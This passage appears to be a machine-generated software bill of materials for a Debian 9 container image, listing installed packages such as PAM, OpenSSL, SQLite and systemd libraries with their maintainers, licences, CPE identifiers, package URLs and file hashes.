cpe:2.3:a:libnss-wrapper:libnss_wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss_wrapper:libnss-wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss_wrapper:libnss_wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss:libnss-wrapper:1.1.3-1:*:*:*:*:*:*:* cpe:2.3:a:libnss:libnss_wrapper:1.1.3-1:*:*:*:*:*:*:* sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/libnss-wrapper/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/libnss-wrapper.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 87 nss-wrapper Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libp11-kit0 0.23.3-2+deb9u1 BSD-3-Clause ISC ISC+IBM permissive-like-automake-output same-as-rest-of-p11kit cpe:2.3:a:libp11-kit0:libp11-kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libp11-kit0@0.23.3-2+deb9u1?arch=amd64&upstream=p11-kit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libp11-kit0:libp11_kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11_kit0:libp11-kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11_kit0:libp11_kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11:libp11-kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libp11:libp11_kit0:0.23.3-2\+deb9u1:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libp11-kit0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libp11-kit0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 439 p11-kit Steve Langasek <vorlon@debian.org> libpam-modules 1.1.8-3.6 GPL cpe:2.3:a:libpam-modules:libpam-modules:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam-modules@1.1.8-3.6?arch=amd64&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libpam-modules:libpam_modules:1.1.8-3.6:*:*:*:*:*:*:* 
cpe:2.3:a:libpam_modules:libpam-modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam_modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam-modules:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam_modules:1.1.8-3.6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam-modules/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-modules:amd64.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-modules:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 874 pam Steve Langasek <vorlon@debian.org> libpam-modules-bin 1.1.8-3.6 GPL cpe:2.3:a:libpam-modules-bin:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam-modules-bin@1.1.8-3.6?arch=amd64&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libpam-modules-bin:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules_bin:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules_bin:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam-modules:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam-modules:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_modules:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam-modules-bin:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam_modules_bin:1.1.8-3.6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam-modules-bin/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-modules-bin.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 220 pam Steve Langasek <vorlon@debian.org> libpam-runtime 1.1.8-3.6 GPL 
cpe:2.3:a:libpam-runtime:libpam-runtime:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam-runtime@1.1.8-3.6?arch=all&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libpam-runtime:libpam_runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_runtime:libpam-runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam_runtime:libpam_runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam-runtime:1.1.8-3.6:*:*:*:*:*:*:* cpe:2.3:a:libpam:libpam_runtime:1.1.8-3.6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam-runtime/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-runtime.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam-runtime.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1016 pam Steve Langasek <vorlon@debian.org> libpam0g 1.1.8-3.6 GPL cpe:2.3:a:libpam0g:libpam0g:1.1.8-3.6:*:*:*:*:*:*:* pkg:deb/debian/libpam0g@1.1.8-3.6?arch=amd64&upstream=pam&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpam0g/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpam0g:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 229 pam Matthew Vernon <matthew@debian.org> libpcre3 2:8.39-3 cpe:2.3:a:libpcre3:libpcre3:2\:8.39-3:*:*:*:*:*:*:* pkg:deb/debian/libpcre3@2:8.39-3?arch=amd64&upstream=pcre3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libpcre3/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libpcre3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 668 
pcre3 Niko Tyni <ntyni@debian.org> libperl5.24 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:libperl5.24:libperl5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/libperl5.24@5.24.1-3+deb9u7?arch=amd64&upstream=perl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libperl5.24/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libperl5.24:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 20936 perl Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> libpq5 14.2-1.pgdg90+1 Artistic BSD-2-Clause BSD-3-Clause BSD-3-Clause Custom-Unicode Custom-pg_dump Custom-regex GPL-1.0-only PostgreSQL TCL blf double-metaphone imath nagaysau-ishii rijndael cpe:2.3:a:libpq5:libpq5:14.2-1.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/libpq5@14.2-1.pgdg90+1?arch=amd64&upstream=postgresql-14&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libpq5/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libpq5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 743 postgresql-14 Matthias Klose <doko@debian.org> libreadline7 7.0-3 GFDL GPL-3.0-only cpe:2.3:a:libreadline7:libreadline7:7.0-3:*:*:*:*:*:*:* pkg:deb/debian/libreadline7@7.0-3?arch=amd64&upstream=readline&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb 
sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libreadline7/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libreadline7:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 416 readline Debian Cyrus SASL Team <pkg-cyrus-sasl2-debian-devel@lists.alioth.debian.org> libsasl2-2 2.1.27~101-g0780600+dfsg-3+deb9u2 BSD-4-Clause GPL-3.0-only GPL-3.0-or-later cpe:2.3:a:libsasl2-2:libsasl2-2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libsasl2-2@2.1.27~101-g0780600+dfsg-3+deb9u2?arch=amd64&upstream=cyrus-sasl2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsasl2-2:libsasl2_2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_2:libsasl2-2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_2:libsasl2_2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2-2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2_2:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libsasl2-2/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libsasl2-2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 184 cyrus-sasl2 Debian Cyrus SASL Team <pkg-cyrus-sasl2-debian-devel@lists.alioth.debian.org> libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3+deb9u2 BSD-4-Clause GPL-3.0-only GPL-3.0-or-later cpe:2.3:a:libsasl2-modules-db:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libsasl2-modules-db@2.1.27~101-g0780600+dfsg-3+deb9u2?arch=amd64&upstream=cyrus-sasl2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsasl2-modules-db:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* 
cpe:2.3:a:libsasl2_modules_db:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules_db:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2-modules:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2-modules:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2_modules:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2-modules-db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:libsasl2:libsasl2_modules_db:2.1.27\~101-g0780600\+dfsg-3\+deb9u2:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libsasl2-modules-db/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libsasl2-modules-db:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 97 cyrus-sasl2 Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libselinux1 2.6-3+b3 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libselinux1:libselinux1:2.6-3\+b3:*:*:*:*:*:*:* pkg:deb/debian/libselinux1@2.6-3+b3?arch=amd64&upstream=libselinux%402.6-3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libselinux1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libselinux1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 209 libselinux 2.6-3 Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libsemanage-common 2.6-2 GPL LGPL cpe:2.3:a:libsemanage-common:libsemanage-common:2.6-2:*:*:*:*:*:*:* 
pkg:deb/debian/libsemanage-common@2.6-2?arch=all&upstream=libsemanage&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsemanage-common:libsemanage_common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage_common:libsemanage-common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage_common:libsemanage_common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage:libsemanage-common:2.6-2:*:*:*:*:*:*:* cpe:2.3:a:libsemanage:libsemanage_common:2.6-2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsemanage-common/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsemanage-common.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsemanage-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 39 libsemanage Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libsemanage1 2.6-2 GPL LGPL cpe:2.3:a:libsemanage1:libsemanage1:2.6-2:*:*:*:*:*:*:* pkg:deb/debian/libsemanage1@2.6-2?arch=amd64&upstream=libsemanage&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsemanage1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsemanage1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 291 libsemanage Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org> libsepol1 2.6-2 GPL LGPL cpe:2.3:a:libsepol1:libsepol1:2.6-2:*:*:*:*:*:*:* pkg:deb/debian/libsepol1@2.6-2?arch=amd64&upstream=libsepol&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsepol1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsepol1:amd64.md5sums 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 653 libsepol Debian util-linux Maintainers <ah-util-linux@debian.org> libsmartcols1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libsmartcols1:libsmartcols1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libsmartcols1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsmartcols1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsmartcols1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 257 util-linux Laszlo Boszormenyi (GCS) <gcs@debian.org> libsqlite3-0 3.16.2-5+deb9u3 GPL-2.0-only GPL-2.0-or-later public-domain cpe:2.3:a:libsqlite3-0:libsqlite3-0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libsqlite3-0@3.16.2-5+deb9u3?arch=amd64&upstream=sqlite3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libsqlite3-0:libsqlite3_0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3_0:libsqlite3-0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3_0:libsqlite3_0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3:libsqlite3-0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libsqlite3:libsqlite3_0:3.16.2-5\+deb9u3:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libsqlite3-0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libsqlite3-0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1163 sqlite3 Theodore Y. 
Ts'o <tytso@mit.edu> libss2 1.43.4-2+deb9u2 cpe:2.3:a:libss2:libss2:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libss2@1.43.4-2+deb9u2?arch=amd64&upstream=e2fsprogs&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libss2/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libss2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 96 e2fsprogs Debian OpenSSL Team <pkg-openssl-devel@lists.alioth.debian.org> libssl1.1 1.1.0l-1~deb9u5 cpe:2.3:a:libssl1.1:libssl1.1:1.1.0l-1\~deb9u5:*:*:*:*:*:*:* pkg:deb/debian/libssl1.1@1.1.0l-1~deb9u5?arch=amd64&upstream=openssl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libssl1.1/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libssl1.1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3565 openssl Debian GCC Maintainers <debian-gcc@lists.debian.org> libstdc++6 6.3.0-18+deb9u1 Artistic GFDL-1.2-only GPL GPL-2.0-only GPL-3.0-only cpe:2.3:a:libstdc\+\+6:libstdc\+\+6:6.3.0-18\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libstdc++6@6.3.0-18+deb9u1?arch=amd64&upstream=gcc-6&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gcc-6-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libstdc++6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1998 gcc-6 Debian systemd Maintainers <pkg-systemd-maintainers@lists.alioth.debian.org> libsystemd0 232-25+deb9u13 CC0 Expat GPL-2.0-only GPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later public-domain 
cpe:2.3:a:libsystemd0:libsystemd0:232-25\+deb9u13:*:*:*:*:*:*:* pkg:deb/debian/libsystemd0@232-25+deb9u13?arch=amd64&upstream=systemd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsystemd0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsystemd0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 654 systemd Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libtasn1-6 4.10-1.1+deb9u1 GFDL-1.3-only GPL-3.0-only LGPL LGPL-2.1-only cpe:2.3:a:libtasn1-6:libtasn1-6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libtasn1-6@4.10-1.1+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libtasn1-6:libtasn1_6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1_6:libtasn1-6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1_6:libtasn1_6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1:libtasn1-6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1:libtasn1_6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libtasn1-6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libtasn1-6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 112 Craig Small <csmall@debian.org> libtinfo5 6.0+20161126-1+deb9u2 cpe:2.3:a:libtinfo5:libtinfo5:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libtinfo5@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libtinfo5/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libtinfo5:amd64.md5sums 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 478 ncurses Debian systemd Maintainers <pkg-systemd-maintainers@lists.alioth.debian.org> libudev1 232-25+deb9u13 CC0 Expat GPL-2.0-only GPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later public-domain cpe:2.3:a:libudev1:libudev1:232-25\+deb9u13:*:*:*:*:*:*:* pkg:deb/debian/libudev1@232-25+deb9u13?arch=amd64&upstream=systemd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libudev1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libudev1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 224 systemd Vaclav Ovsik <vaclav.ovsik@i.cz> libustr-1.0-1 1.0.4-6 BSD-2-Clause GPL-2.0-only GPL-2.0-or-later LGPL-2.0-or-later LGPL-2.1-only MIT cpe:2.3:a:libustr-1.0-1:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* pkg:deb/debian/libustr-1.0-1@1.0.4-6?arch=amd64&upstream=ustr&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libustr-1.0-1:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0_1:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0_1:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr-1.0:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr-1.0:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libustr-1.0-1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libustr-1.0-1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 258 ustr Debian util-linux Maintainers 
<ah-util-linux@debian.org> libuuid1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libuuid1:libuuid1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libuuid1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libuuid1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libuuid1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 107 util-linux Debian XML/SGML Group 